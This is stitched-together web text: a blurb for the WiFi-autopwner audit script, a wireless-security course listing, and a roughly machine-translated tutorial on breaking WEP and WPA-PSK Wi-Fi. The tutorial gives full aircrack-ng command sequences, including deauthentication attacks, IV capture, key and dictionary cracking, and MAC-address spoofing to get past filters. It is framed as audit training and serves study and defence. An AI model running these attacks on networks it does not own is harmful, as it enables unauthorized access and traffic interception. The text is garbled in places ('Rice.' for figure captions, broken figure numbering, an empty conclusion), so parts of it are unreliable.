Instructions 

Security audit of wireless Wi-Fi networks. WiFi-autopwner: script for automatically searching and auditing Wi-Fi networks with low security Hacking wireless networks

Audit at each new location wireless networks starts with the same steps:

  • search for open networks
  • searching and hacking networks with WEP encryption
  • search for networks with WPS enabled, check for susceptibility to Pixie Dust attack
  • collecting handshakes and running them through dictionaries

These actions are trivial, and WiFi-autopwner aims to fully automate them so as not to waste time on them.

After launch:

Sudo bash wifi-autopwner.sh

A text menu will open:

If you have only one wireless interface, it will be selected automatically. If there are several interfaces, then go to the corresponding menu item and select the interface you want to use. Next, switch this interface to monitor mode - the program has two options: one simply switches to monitor mode, and the second also closes programs that may interfere with it.

Now just select the ninth item “ Automatic audit Wi-Fi networks " and go about your business. When choosing automatic audit, the program:

  • will search for open networks
  • will search for networks with WEP encryption and try to hack each of them
  • will search for WPS networks and try to perform a Pixie Dust attack against each of them
  • will try to collect handshakes for all networks within range.

Each stage has its own timeouts, i.e. the program will not get stuck at one of the stages.

In the future, it is planned to add a dictionary and a function to automatically start cracking passwords from captured handshakes.

Searching for WPS pins

The program has built-in functionality for . For simple search of WPS pins (without Pixie Dust attack), select menu number 6 " Attack on WPS" Even if your Reaver constantly shows you Reaver errors: WARNING: Failed to associate with and WPS transaction failed (code: 0x03), re-trying last pin, then there is a chance that everything will work out in WiFi-autopwner.

The program itself will search for access points with WPS; you just need to select the number of the AP you want to attack.

Basic course (Code BT09), 2 days

annotation

The purpose of this course is a practical study of security issues and security features of wireless networks. The course rationally alternates between systematic theoretical information and practical work by students under the guidance of an experienced instructor. The theoretical part of the course includes basic information on the architecture of wireless networks, existing standards in this area and security mechanisms built into equipment for building wireless networks. In addition, an effective methodology is proposed for integrating a wireless network with the existing network infrastructure, taking into account all aspects of security. More than 50% of teaching time is spent practical work at specially prepared stands illustrating various solutions for protecting wireless networks.

During the training process, students acquire skills in working with NetStumbler, Kismet, AirSnort, aircrack and other wireless network monitoring tools. Particular attention is paid to the use of the most common wireless network audit tools, both commercial and freely distributed.

Audience

Preliminary preparation

Basic knowledge of network technologies, basic protocols and services of the TCP/IP stack, skills in working with Windows 2003 and Linux. You can test your knowledge of the TCP/IP stack protocols by requesting a self-test from the Learning Center. Knowledge welcome modern technologies and security protocols: VPN, PKI, IPSec.

As preliminary preparation, we recommend taking the following courses:

  • BT05 "TCP/IP Basics"- intensive course on setting up and using TCP/IP stack protocols in various operating systems
  • BT03 "Computer Network Security" - in-depth course on network computer security issues

Upon completion of training

You will acquire systematic knowledge on:

  • Wireless network architecture
  • Available security mechanisms built into wireless networking equipment
  • Using additional wireless network security mechanisms
  • Features of using attack detection systems and security scanners in wireless networks
  • Security issues related to the use of Bluetooth devices

You can:

  • Enable basic data protection mechanisms in wireless networks
  • Increase the security of your wireless network using VPN and IEEE802.1x technologies
  • Monitor wireless networks
  • Perform wireless security audits

Additionally

Training in this course is taken into account when receiving specialists state documents in the field of information security at the Informzashita Training Center in accordance with REGULATIONS on the conditions for specialists to receive state documents on advanced training in the field of information security.

Each student receives a branded certificate specifically designed for this course tutorial and a CD containing versions of the main security tools discussed in the course, additional and background information on the subject of the course.

Course program

  • Wireless technologies - general information.
    Introduction. 802.11 standard. Equipment and architecture of wireless networks. Threats associated with the use of wireless networks. Working with the NetStumbler program. Detecting and connecting to a wireless network (practice).
  • Basic data protection mechanisms in wireless networks.
    DSSS technology. Filtering based on MAC addresses. Unauthorized connection to an access point that uses access control based on MAC addresses (practice). Use of security mechanisms built into access points. WEP protocol, its advantages and disadvantages. Kismet and AirSnort programs. Using WEP, cracking the WEP key (practice).
  • Protecting wireless networks at the network level.
    Separation of a wireless network into a separate segment. Using IPSec to protect wireless client traffic (practice). Application of VPN technologies to protect wireless networks (practice).
  • WPA (Wi-Fi Protected Access) and 802.11i standards.
    IEEE802.1x standard. Authentication protocols EAP, PEAP. Building a network infrastructure based on the recommendations of the IEEE802.1x standard (practice). TKIP protocol, Michael method and WPA technology. 802.11i standard.
  • Detection of attacks in wireless networks.
    Collection of information about wireless networks (war driving). Detection of unauthorized access points and wireless clients. Denial of service. Access point bypass. Protecting wireless network clients (practice). Using attack detection systems.
  • Wireless network audit.
    Specifics of security analysis of wireless networks. Security scanners for wireless networks (demonstration). Final recommendations.
  • WPAN networks.
    Bluetooth security. WPAN standards. Bluetooth architecture. Operating modes of Bluetooth devices. Search for Bluetooth devices using various tools. Vulnerabilities of Bluetooth devices, tools for identifying them.

The last few years have seen the rise of wireless technology. Wi-Fi networks (802.11a/b/g standard networks) are becoming increasingly popular, and if earlier it was mainly about the use of wireless networks in offices and hot spots, now they are widely used both at home and for deploying mobile phones. offices (offices during business trips). Wireless access points and SOHO class wireless routers are sold especially for home users and small offices, and pocket wireless routers are sold for mobile users. However, when deciding to switch to a wireless network, it should be remembered that at the current stage of development it has one significant drawback - imperfection in terms of security. In this article we will talk about the most vulnerable areas of wireless networks and show with practical examples how they are hacked. The knowledge gained can be successfully used to audit the security of wireless networks, which will allow you to avoid traditional mistakes made when deploying wireless networks. We'll first look at the basic security measures used to protect wireless networks today, and then talk about how they can be overcome by attackers.

Wireless Network Security Methods

The 802.11a/b/g wireless network standards provide several security mechanisms:

  • authentication and data encryption mode using the WEP (Wired Equivalent Privacy) protocol;
  • authentication and data encryption mode using the WPA (Wi-Fi Protected Access) protocol;
  • filtering by MAC addresses;
  • using hidden network identifier mode.

WEP protocol

All modern wireless devices(access points, wireless adapters and routers) support the WEP security protocol, which was originally included in the IEEE 802.11 wireless network specification.

The WEP protocol allows you to encrypt the transmitted data stream based on the RC4 algorithm with a key size of 64 or 128 bits. Some devices also support keys of 152, 256 and 512 bits, but this is rather the exception to the rule. The keys have a so-called static component of 40 and 104 bits in length, respectively, for 64- and 128-bit keys, as well as an additional dynamic component of 24 bits in size, called the Initialization Vector (IV).

At the simplest level, the WEP encryption procedure is as follows. Initially, the data transmitted in the packet is checked for integrity (CRC-32 algorithm), after which the checksum (Integrity Check Value, ICV) is added to the service field of the packet header. Next, a 24-bit initialization vector (IV) is generated, to which a static (40- or 104-bit) secret key is added. The 64- or 128-bit key thus obtained is the initial key for generating the pseudo-random number used to encrypt the data. Next, the data is mixed (encrypted) using the logical XOR operation with a pseudo-random key sequence, and the initialization vector is added to the frame service field.

On the receiving side, the data can be decrypted, since information about the initialization vector is transmitted along with it, and the static component of the key is stored by the user to whom the data is transferred.

The WEP protocol provides two methods of user authentication: Open System (open) and Shared Key (shared). With open authentication, no authentication actually occurs, meaning any user can gain access to the wireless network. However, even in case open system WEP data encryption is allowed.

WAP protocol

In 2003, another security standard was introduced - WPA. main feature which is a technology for dynamically generating data encryption keys, built on the basis of the TKIP (Temporal Key Integrity Protocol), which is a further development of the RC4 encryption algorithm. Via TKIP protocol network devices work with a 48-bit initialization vector (as opposed to the 24-bit WEP vector) and implement rules for changing the sequence of its bits, which eliminates key reuse. The TKIP protocol provides for the generation of a new 128-bit key for each transmitted packet. In addition, cryptographic checksums in WPA are calculated using a new method - MIC (Message Integrity Code). Each frame contains a special eight-byte message integrity code, the verification of which allows you to repel attacks using forged packets. As a result, it turns out that each data packet transmitted over the network has its own unique key, and each wireless network device is endowed with a dynamically changing key.

In addition, the WPA protocol supports encryption using the advanced AES (Advanced Encryption Standard) standard, which has a more secure cryptographic algorithm compared to the WEP and TKIP protocols.

When deploying wireless networks at home or in small offices, a variant of the protocol is usually used WPA security based on shared keys - WPA-PSK (Pre Shared Key). In the future, we will consider only the WPA-PSK option, without touching on the WPA protocol options aimed at corporate networks, where user authorization is performed on a separate RADIUS server.

When using WPA-PSK in access point settings and profiles wireless connection clients specify a password ranging from 8 to 63 characters long.

MAC Address Filtering

MAC address filtering, which is supported by all modern access points and wireless routers, although not integral part The 802.11 standard is nevertheless considered to improve the security of a wireless network. To implement this function, a table of MAC addresses of wireless adapters of clients authorized to work in this network is created in the access point settings.

Hidden SSID mode

Another precaution often used in wireless networks is the hidden network identifier mode. Each wireless network is assigned a unique identifier (SSID), which is the name of the network. When a user tries to log into a network, the wireless adapter driver first scans the airwaves for the presence of wireless networks. When using the hidden identifier mode (as a rule, this mode is called Hide SSID), the network is not displayed in the list of available ones and you can connect to it only if, firstly, its SSID is precisely known, and secondly, a profile has been created in advance connection to this network.

Hacking wireless networks

Having familiarized ourselves with the main methods of protecting 802.11a/b/g networks, we will consider ways to overcome them. Note that the same tools are used to hack WEP and WPA networks, so first we will tell you what is included in the attacker’s arsenal.

First of all, we need a laptop with a wireless adapter. The main problem that arises in the process of selecting wireless hacking tools is ensuring compatibility between the wireless adapter chip used by the software and operating system.

Selecting a wireless adapter

The fact is that most utilities that allow you to hack wireless networks are designed for Linux systems. There are versions of some utilities for Windows XP. However, depending on the wireless adapter chip, certain wireless cards can be used with utilities for both Linux and Windows XP systems, and some wireless adapters can be used with utilities only under Linux or only under Windows XP systems. There are wireless adapters that are not supported by either Linux or Windows XP utilities. In addition, there are chips that, although supported by utilities, work extremely slowly (in terms of capturing and analyzing packets).

The fact is that to perform the task of hacking wireless networks, special (non-standard) drivers for wireless network adapters are required. The standard modes of any wireless adapter are Infrastructure (Basic Service Set, BSS) and ad-hoc (Independent Basic Service Set, IBSS). In Infrastructure mode, each client is connected to the network through an access point, and in ad-hoc mode, wireless adapters can communicate with each other directly, without using an access point. However, both of these modes do not allow the wireless adapter to listen on the air and intercept packets. In both cases, the network adapter will catch packets that are intended only for the network for which it is configured. In order to be able to see other networks (having a hidden ESSID) and capture packets, there is a special monitoring mode (Monitor mode), when switched to which the adapter is not associated with any specific network and catches everything available packages. Typically, the drivers supplied by the wireless adapter manufacturer do not support monitoring mode, and in order to enable it, you must install special drivers, often written by a group of third-party developers. It should be immediately noted that for Windows operating systems such special drivers exist only for wireless adapters based on Hermes, Realtek, Aironet and Atheros chips. Driver support for this mode for operating systems of the Linux/BSD family is largely determined by the openness of the specifications for the card, however, the list of supported devices is much wider than for the Windows family. Drivers for Linux/BSD systems with support for monitoring mode can be found for wireless adapters based on the following chipsets: Prism, Orinoco, Atheros, Ralink, Aironet, Realtek, Hermes and Intel, although drivers based on Intel chips are not suitable for all devices.

Currently, all laptops based on mobile technology Intel Centrino have built-in wireless adapters based on chips from Intel (chips IPW2100, IPW2200, IPW2915, IPW3945), but for our purposes these adapters are not suitable - although they are compatible with Linux utilities used for hacking, these chips work extremely slowly, and are generally incompatible with Windows utilities.

Selecting an operating system

Regarding the choice of operating system, the following recommendations can be given. Linux systems are more preferable for these purposes, since using Linux the range of possible tools is much wider, and Linux utilities work much faster. But this does not mean that you cannot use Windows XP together with Windows utilities. In the future, we will consider both options for hacking wireless networks - that is, using both Linux and Windows utilities. At the same time, we understand perfectly well that not all users are in a hurry to switch from Windows to Linux. Despite all its shortcomings, Windows OS is much more widespread, and it is much easier to learn for a novice user. Therefore, the optimal option, in our opinion, is to use Windows XP as the main operating system on a laptop, and for wireless network hacking tasks - OS Linux Live CD, which runs from a CD and does not require installation on HDD computer. The best solution in our case there will be a BackTrack disk, which is built on the Linux OS (kernel version 2.6.18.3) and contains all the necessary tool packages for hacking networks. An image of this disk can be downloaded from the website using the link: http://www.remote-exploit.org/backtrack.html.

Software Set

Traditionally used to hack wireless networks software package aircrack, which exists in versions for both Windows XP (aircrack-ng 0.6.2-win) and Linux (aircrack-ng 0.7). This package is distributed absolutely free of charge and can be downloaded from the official website www.aircrack-ng.org. There is simply no point in looking for any other utilities, since Current Package is a best-in-class solution. In addition, it (the Linux version, of course) is included in the BackTrack disk.

Hacking Wireless Networks Using a BackTrack Live CD

So, no matter what operating system you have installed on your laptop, we will use boot disk BackTrack. Note that in addition to the tools we need to hack a wireless network, this disk contains many other utilities that allow you to audit networks (port scanners, sniffers, etc.). By the way, such a disk is useful for anyone to have system administrator, engaged in network auditing.

Hacking any wireless network using the BackTrack disk is carried out in three stages (Table 1):

  • collecting information about the wireless network;
  • packet capture;
  • packet analysis.

The first step is to collect detailed information about the wireless network that is being hacked: the MAC addresses of the access point and the active client of the wireless network, the name of the network (network ID) and the type of encryption used. To do this, use the airmon-ng, airodump-ng and Kismet utilities - the first of them is necessary to configure the wireless driver network adapter to the wireless network monitoring mode, and the other two allow you to obtain the necessary information about the wireless network. All of these utilities are already included on the BackTrack disk.

Table 1. Steps to hack a wireless network using the BackTrack Live CD

Stage number

Description

Utilities used

Result

Collecting wireless network information

airmon-ng airodump-ng Kismet

Access point MAC address, active client MAC address, network type, network ID, encryption type (WEP, WPA-PSK), communication channel number

Packet interception

airodump-ng Kismet airoplay-ng

Packet analysis

Key selection

Password selection

The next step is to capture packets using the airodump-ng utility. In the case where WEP encryption is used on the network, it is necessary to collect IV packets containing initialization vectors. If the traffic on the network is low (for example, the client is inactive), then you can additionally use the airoplay-ng utility to increase traffic between the client and the access point.

If the network uses WPA-PSK encryption, then it is necessary to collect packets that contain information about the client authentication procedure on the network (handshake procedure). In order to force the client to undergo the authentication procedure on the network, you can use the airoplay-ng utility to initiate the process of forcibly disconnecting it from the network and then restoring the connection.

At the last stage, the intercepted information is analyzed using the aircrack-ng utility. In the case of WEP encryption, the probability of guessing the key depends on the number of collected IV packets, and WPA-PSK encryption depends on the dictionary used to guess the password.

Practical examples

After brief description procedures for hacking a wireless network, let's move on to consider practical examples with detailed description each stage and utilities used.

In our case, we were dealing with an experimental network consisting of a D-Link DWL-7000AP access point and a network client with a Gigabyte GN-WPEAG wireless PCI adapter.

To hack the network, we used a laptop with a Gigabyte GN-WMAG wireless PCMCIA adapter based on the Atheros chip. Note that when using the BackTrack disk, no additional drivers are required for the Gigabyte GN-WPEAG adapter - everything is already on the disk.

Stage 1. Collecting information about the wireless network

So, at the first stage we need to collect information about the wireless network. Insert into laptop wireless adapter and load the operating system from the CD. Then call the console and launch the airmon-ng utility, included in the aircrack-ng package.

This utility allows you to determine the available wireless interfaces and assign the network monitoring mode to one of the available interfaces.

The syntax for using the airmon-ng command is as follows:

airmon-ng ,

where are the options determine the start or stop of the monitoring mode, - the wireless interface being monitored, and the optional parameter specifies the number of the channel in the wireless network that is being monitored.

Initially, the airmon-ng command is specified without parameters, which allows you to get a list of available wireless interfaces. For example, in our case, the response to the airmon-ng command was as follows:

Usage:airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

Selecting as wireless interface wifi0, enter the command airmon-ng start wifi0. As a result, we get another interface ath1, which is in monitoring mode (Fig. 1).

Rice. 1. Setting the wireless network monitoring mode

Next, you need to run the airodump-ng utility, which is used both to capture packets in 802.11 wireless networks and to collect information about the wireless network. The syntax for using the command is as follows:

airodump-ng .

Possible command options are shown in the table. 2.

Table 2. Possible options for the airodump-ng command

Possible meaning

Description

Save only IV packets

Use GPS daemon. In this case, the coordinates of the receiving point will also be recorded

Write (or -w)

File name

Specifying the name of the file to be recorded. If you specify only the file name, it will be saved in the program’s working directory

Record all packets without filtering

Channel number (1 to 11)

Specifying the channel number. By default, all channels are listened to.

Specifying the 802.11a/b/g protocol

In our case, the ath1 interface is set to monitoring mode.

However, so far we do not have information about the type of network (802.11a/b/g), the type of encryption on the network, and therefore we do not know which packets need to be intercepted (all or only IV packets). Therefore, initially you should not use options in the airodump-ng command, but only need to specify the interface - this will allow us to build necessary information about the network.

Thus, in the first stage, we launch the airodump-ng command using the following syntax:

airodump-ng-ath1

This will allow us to obtain the necessary information about the network, namely:

  • MAC address of the access point;
  • Client MAC address;
  • network type;
  • E Network SSID;
  • encryption type;
  • communication channel number.

In our example, by entering the airodump-ng ath1 command, we were able to determine all the necessary network parameters (Fig. 2):

Rice. 2. Gathering information about the network
using the airodump-ng utility

  • The MAC address of the access point is 00:0D:88:56:33:B5;
  • Client MAC address - 00:0E:35:48:C4:76
  • network type - 802.11g;
  • Network ESSID - dlinkG;
  • encryption type - WEP;
  • communication channel number - 11.

Note that the airodump-ng utility allows you to determine the network identifier (ESSID) regardless of whether the access point is set to Hidden SSID mode or not.

To collect information about the network, you can also use the Kismet utility included in the BackTrack disk - unlike airodump-ng, it allows you to collect much more information about the wireless network and in this sense is a complete and best-in-class wireless network analyzer. This utility has GUI(Fig. 3), which makes working with it much easier.

Rice. 3. Gathering information about the network
using the Kismet utility

Stage 2: Packet interception

Once detailed information about the wireless network has been collected, you can begin intercepting packets using the same utilities that were used to collect information about the network - airodump-ng or Kismet. However, in this case we will need a slightly different command syntax.

WEP encryption

First, let's consider the option when the network uses WEP encryption. In this case, we need to filter only packets with an initialization vector (IV packets) and write them to a file, which will later be used to select a key.

For example, if it is known that the attacked network is an 802.11g network, it uses WEP encryption and transmission is carried out on channel 11, then the command syntax for intercepting packets could be as follows:

airodump-ng --ivs –w dump --band g --channel 11 ath1

IN in this example we write only IV packets to a file called dump. The probability of successful key selection depends on the number of accumulated IV-packets and the length of the key. As a rule, with a key length of 128 bits, it is enough to accumulate about 1-2 million IV packets, and with a key length of 64 bits - on the order of several hundred thousand packets. However, the length of the key is unknown in advance and no utility can determine it. Therefore, for analysis it is desirable to intercept at least 1.5 million packets. In Fig. Figure 4 shows an example of capturing 1,137,637 IV packets in the airodump-ng utility.

Rice. 4. Capture packets using the airodump-ng utility

The number of packets captured is interactively displayed in the airodump-ng utility, and to stop the packet capture process you just need to press the Ctrl+C key combination.

The Kismet utility can also be used to capture packets. Actually, the interception process begins immediately after the utility is launched, and recording is made to a file with the dump extension, which is saved in the working directory of the program. However, unlike the airodump-ng utility, in this case it is impossible to filter only IV packets and set the communication channel number. Therefore, when using the Kismet utility, the efficiency (accumulation rate) of packets is lower, and the number of packets that need to be intercepted should be greater than when using the airodump-ng utility.

Often, when intercepting packets, a situation arises when there is no intensive traffic exchange between the access point and the client, therefore, in order to accumulate the number of packets required for successful network hacking, you have to wait a very long time. However, this process can be accelerated by forcing the client to communicate with the access point using the aireplay-ng utility (Fig. 5). This utility is launched in parallel with the airodump-ng utility, for which you need to launch another console session.

Rice. 5. Using the aireplay-ng utility to initialize traffic
between access point and client

The command syntax is as follows:

aireplay-ng

This team has a very a large number of various options, which can be viewed by running the command without parameters.

For our purposes, the command syntax will look like this:

aireplay –ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 20 ath1

In this case, the -e dlinkG parameter specifies the wireless network ID; parameter -a 00:0d:88:56:33:b5 - MAC address of the access point; parameter -c 00:0f:ea:91:7d:95 - client MAC address; option --deauth 20 - attack to break the connection (20 times) followed by client authentication. When a client is authenticated, the traffic between it and the access point increases sharply and the number of packets that can be intercepted increases. If necessary, you can increase the number of connection breaks or repeat this command until the required number of packets has accumulated.

WPA-PSK encryption

With WPA-PSK encryption on a wireless network, the packet interception algorithm is slightly different. In this case, we do not need to filter out IV packets, since with WPA-PSK encryption they simply do not exist, but it also makes no sense to capture all packets in a row. Actually, all we need is a small part of the traffic between the access point and the wireless network client, which would contain information about the client authentication procedure on the network (handshake procedure). But in order to intercept the client authentication procedure on the network, it must first be forcibly initiated using the aireplay-ng utility.

Therefore, with WPA-PSK encryption, the packet interception algorithm will be as follows. We open two console sessions and in the first session we run a command to force the network to disconnect followed by re-identification of the client (aireplay-ng utility, deauthentication attack), and in the second session with a pause of one or two seconds we run a command to intercept packets (airodump-ng utility ). The command syntaxes are as follows:

aireplay–ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 -deauth 10 ath1

airodump-ng –w dump -band g -channel 11 ath1

As you can see, the syntax of the aireplay-ng command is exactly the same as for WEP encryption, when this command used to initialize traffic between the access point and the network client (the only difference is fewer deauthentication packets). The airodump-ng command syntax lacks an IV packet filter.

The process of capturing packets needs to continue for only a few seconds, since with the deauthentication attack activated, the probability of capturing handshake packets is almost one hundred percent.

Stage 3: Packet Analysis

At the last stage, the intercepted packets are analyzed using the aircrack-ng utility, which is launched in a console session. Naturally, the syntax of the aircrack-ng command is different for WEP and WPA-PSK encryption. The general command syntax is as follows:

aircrack-ng

Possible command options are presented in table. 3. Note that several files with the extension *.cap or *.ivs can be specified as files containing captured packets (capture file(s)). In addition, when hacking networks with WEP encryption, the airodump-ng and aircrack-ng utilities can be launched simultaneously (two console sessions are used). In this case, aircrack-ng will automatically update the database of IV packages.

Table 3. Possible options for the aircrack-ng command

Possible meaning

Description

1 = static WEP, 2 = WPA-PSK

Specifies the type of attack (WEP or WPA-PSK)

If the option is given, all IV packets with the same ESSID value will be used. This option is also used to hack WPA-PSK networks if the ESSID is not broadcast (hidden network identifier mode)

Access point MAC address

Selecting a network based on the access point's MAC address

Hidden operation mode. Information is not displayed until the key is found or the key cannot be found

For WEP networks, it limits key selection to only a set of numbers and letters

For WEP networks, limits key guessing to only a set of hexadecimal characters

For WEP networks, it limits key selection to only a set of numbers

For WEP networks, specifies the beginning of the key in hexadecimal format. Used to debug the program

Client MAC address

For WEP networks, sets a packet filter based on the client's MAC address. -m ff:ff:ff:ff:ff:ff is used to collect all IV packets

64 (for 40-bit key) 128 (for 104-bit key) 152 (for 128-bit key) 256 (for 232-bit key) 512 (for 488-bit key)

For WEP networks, specifies the key length. The default key length is 104 bits

For WEP networks, indicates the collection of IV packets that have a given key index (from 1 to 4). Default this option ignored

The parameter is used when cracking WEP networks - for a 104-bit key the default value is 2, for 40-bit keys - 5. A higher value of this parameter allows you to calculate keys with fewer packets, but over a longer time

Used when hacking WEP networks. This parameter allows you to exclude specific types of korek attacks (there are 17 types of korek attacks in total)

Used when hacking WEP networks. Disables searching for the last character in a key

Used when hacking WEP networks. Allows searching for the last character in a key (default)

Used when hacking WEP networks. Allows searching for the last two characters in a key

Used when hacking WEP networks. Prohibits the use of multiple processors in SMP systems

Used when hacking WEP networks. Allows you to use a special (experimental) type of attack to select a key. Used when standard attacks do not allow finding the key when using more than 1 million IV packets

Path to dictionary

During a WPA-PSK attack, specifies the path to the dictionary used

When using WEP encryption, the main problem is that we do not know in advance the length of the key used for encryption. Therefore, you can try to try several options for the key length, which is specified by the -n parameter. If this parameter is not specified, the default key length is set to 104 bits (-n 128).

If some information about the key itself is known (for example, it consists only of numbers, or only of letters, or only of a set of letters and numbers, but does not contain special characters), then you can use the -c, -t and -h options.

In our case, we used the aircrack-ng command with the following syntax:

aircrack-ng –a 1 –e dlinkG –b 00:0d:88:56:33:b5 –c 00:0f:ea:91:7d:95 –n 128 dump.ivs.

Here, specifying the MAC address of the access point and client, as well as the network ESSID, is redundant, since only one access point and one wireless client were used. However, if there are several clients and there are several access points, then these parameters must also be specified.

As a result, we were able to find a 128-bit key in just 25 s (Fig. 6). As you can see, hacking a network based on WEP encryption is not a serious problem, but it does not always end in success. It may turn out that not enough IV packets have been accumulated to select a key.

Rice. 6. Selection of a 128-bit key
using the aircrack-ng utility

WPA-PSK encryption uses the following command syntax:

aircrack-ng –a 2 –e dlinkG–b 00:0d:88:56:33:b5 –w dict dump.cap.

In this case, the probability of a positive result, that is, the probability of guessing the entire password, depends on the dictionary used. If the password is in the dictionary, it will be found. The dictionary used by the aircrack-ng program must first be mounted in working folder program or specify the full path to the dictionary. Selection good dictionaries can be found at www.insidepro.com. If they don’t help, then most likely the password is a meaningless set of characters. After all, dictionaries contain words or phrases, as well as convenient, easy-to-remember keyboard shortcuts. It is clear that there is no arbitrary set of characters in dictionaries. But even in this case there is a way out. Some utilities designed for password guessing can generate dictionaries from a given set of characters and maximum word length. An example of such a program is PasswordPro v.2.2.5.0.

However, we note once again that the probability of hacking a WPA-PSK password is very low. If the password is not specified in the form of any word, but is a random combination of letters and numbers, then it is almost impossible to guess it.

Generalization

To summarize everything that was said above about hacking wireless networks, we will once again list the main stages of this process and the commands used at each of them.

Stage 1. Gathering information about the network:

Airmon-ng start wifi0;

Airodump-ng ath1.

Stage 2. Collecting packages:

  • WEP case:

Airodump-ng --ivs -w dump --band g --channel 11 ath1,

Aireplay -ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 20 ath1

(if there is insufficient traffic. The command is launched in a separate console session);

  • WPA-PSC case:

-aireplay-ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 10 ath1,

Airodump-ng -w dump --band g --channel 11 ath1

(the command is run in a separate console session).

Stage 3. Packet analysis:

  • WEP case:

Aircrack-ng -a 1 -e dlinkG -b 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 -n 128 dump.ivs;

  • WPA-PSK case:

Aircrack-ng -a 2 -e dlinkG-b 00:0d:88:56:33:b5 -w dict dump.cap.

Hacking wireless networks using the aircrack-ng 0.6.2-win package and Windows XP

As we already noted at the beginning of the article, there is a version of the aircrack-ng package 0.6.2-win supported by the operating system Windows system XP. Let us immediately note that the capabilities of the package are not as extensive as compared to its Linux counterpart, and therefore, if there is no strong prejudice against Linux, then it is better to use the option with the BackTrack disk.

The first thing you will have to face when using the Windows version of the aircrack-ng program is the need to replace the standard drivers from the wireless network adapter manufacturer with special drivers that support monitoring and packet interception mode. Moreover, as in the case of the Linux version of the program, the specific version of the driver depends on the chip on which the network adapter is built. For example, when using our Gigabyte GN-WMAG wireless PCMCIA adapter based on the Atheros AR5004 chip, we used driver version 5.2.1.1 from WildPackets.

The procedure for hacking a wireless network using the Windows version of the aircrack-ng package is quite simple and conceptually repeats the procedure for hacking wireless networks using the Linux version of the package. It is traditionally performed in three stages: collecting information about the network, intercepting packets and analyzing them.

To start working with the utility, you need to run the Aircrack-ng GUI.exe file, which has a convenient graphical interface and is, in fact, a graphical shell for all the utilities included in the aircrack-ng 0.6.2-win package. The main program window (Fig. 7) has several tabs, by switching between which you can activate the necessary utilities.

Rice. 7. Main window of the Aircrack-ng GUI utility

To collect the necessary information about the network, you need to go to the airdump-ng tab, after which the airdump-ng 0.6.2 utility will launch in a separate window.

When you run the airdump-ng 0.6.2 program (Fig. 8), a dialog box will open in which you will need to specify the wireless network adapter (Network interface index number), network adapter chip type (Network interface type (o/a)), channel number wireless communication(Channel(s): 1 to 14, 0=all) (if the channel number is unknown, then all channels can be scanned). In addition, the name of the output file in which the captured packets are stored is specified (Output filename prefix), and it is indicated whether it is necessary to capture all entire packets (CAP files) or only part of the packets with initialization vectors (IVS files) (Only write WEP IVs (y/n)). With WEP encryption, to select a secret key, it is enough to generate only an IVS file, but when using WPA-PSK encryption, you will need a cap file. By default, IVS or CAP files are created in the same directory as the airdump-ng 0.6.2 program.

Rice. 8. Setting up the airdump-ng 0.6.2 utility

After configuring all the options of the airodump-ng 0.6.2 utility, an information window will open, which displays information about detected wireless access points, information about network clients, and statistics of intercepted packets (Fig. 9).

Rice. 9. Information window of the airodump-ng 0.6.2 utility

If there are several access points, statistics will be displayed for each of them.

The first step is to write down the MAC address of the access point, the SSID of the wireless network and the MAC address of one of the clients connected to it (if there are several of them). Then you need to wait until a sufficient number of packets have been intercepted. To stop the packet capture process (utility operation), use the Ctrl+C key combination. Note that the Windows version of the package does not provide methods to forcefully increase traffic between the access point and the network client (remember that the Linux version of the package provides the aireplay-ng utility for this).

The main problem when hacking WPA-PSK networks using the Windows version of the Aircrack-ng GNU 0.6.2 program is that it is necessary to capture the client initialization procedure on the network in the CAP file, that is, you will have to sit in ambush with running program airodump-ng. Once the network client initialization procedure is captured in the CAP file, you can stop the airodump program and begin the decryption process. Actually, in this case there is no need to accumulate intercepted packets, since only packets transmitted between the access point and the client during initialization are used to calculate the secret key.

In the case of WEP encryption, after generating the output IVS file, you can begin to analyze it using the aircrack-ng 0.6.2 utility, to launch which you again need to open the main window of the Aircrack-ng GUI program on the appropriate tab and configure the aircrack-ng utility. With WEP encryption, setting up the utility consists of setting the length of the WEP key, specifying the ESSID of the wireless network, setting the MAC address of the access point, excluding certain types of attacks (RoreK attacks), setting, if necessary, the character set used for the key, and etc. All the same settings are provided here as in the case of the Linux version of this utility. The only difference is that in the Linux version all settings are specified as options in command line, and in the Windows version, a convenient graphical interface is used to configure the utility (Fig. 10).

Rice. 11. Result of IVS file analysis
aircrack-ng 0.6.2 utility

The result of the IVS file analysis is shown in Fig. 11. It is unlikely that the line KEY FOUND! needs comments. Please note: the secret key was calculated in just 1 second!

When using WPA-PSK encryption in the settings of the aircrack-ng 0.6.2 utility, it is necessary to use the CAP file as the output file, and not the IVS file. In addition, you need to specify the path to the dictionary used for hacking, which is pre-installed in the directory with the aircrack-ng 0.6.2 program (Fig. 12).

Rice. 12. Result of ivs file analysis
aircrack-ng 0.6.2 utility

The result of the CAP file analysis is shown in Fig. 13. However, it should be borne in mind that a positive result of the key search is possible only if the password is present in the analyzed dictionary.

Rice. 13. Result of CAP file analysis

Bypassing MAC address filter protection

At the very beginning of the article, we noted that in addition to WEP and WPA-PSK encryption, functions such as hidden network identifier mode and MAC address filtering are often used. These are traditionally classified as wireless security features.

As we have already demonstrated with the aircrack-ng package, you cannot rely on the hidden network identifier mode at all. The airodump-ng utility we mentioned will still show you the network SSID, which can later be used to create a connection profile (unauthorized!) to the network.

Well, if we talk about such a security measure as filtering by MAC addresses, then everything is very simple here. On the Internet you can find quite a lot of different utilities for both Linux and Windows that allow you to replace the MAC address of a network interface. As an example, we can cite the following Windows utilities: SMAC 2.0 (paid utility, http://www.klcconsulting.net/smac), MAC MakeUP (free utility, www.gorlani.com/publicprj/macmakeup/macmakeup.asp - fig . 14) or MAC Spoofer 2006 (free utility).

Rice. 14. MAC address spoofing using the MAC MakeUP utility

Having carried out such a substitution, you can pretend to be your own and implement unauthorized access to a wireless network. Moreover, both clients (real and uninvited) will exist quite calmly on the same network with the same MAC address, moreover, in this case the uninvited guest will be assigned exactly the same IP address as the real network client.

conclusions

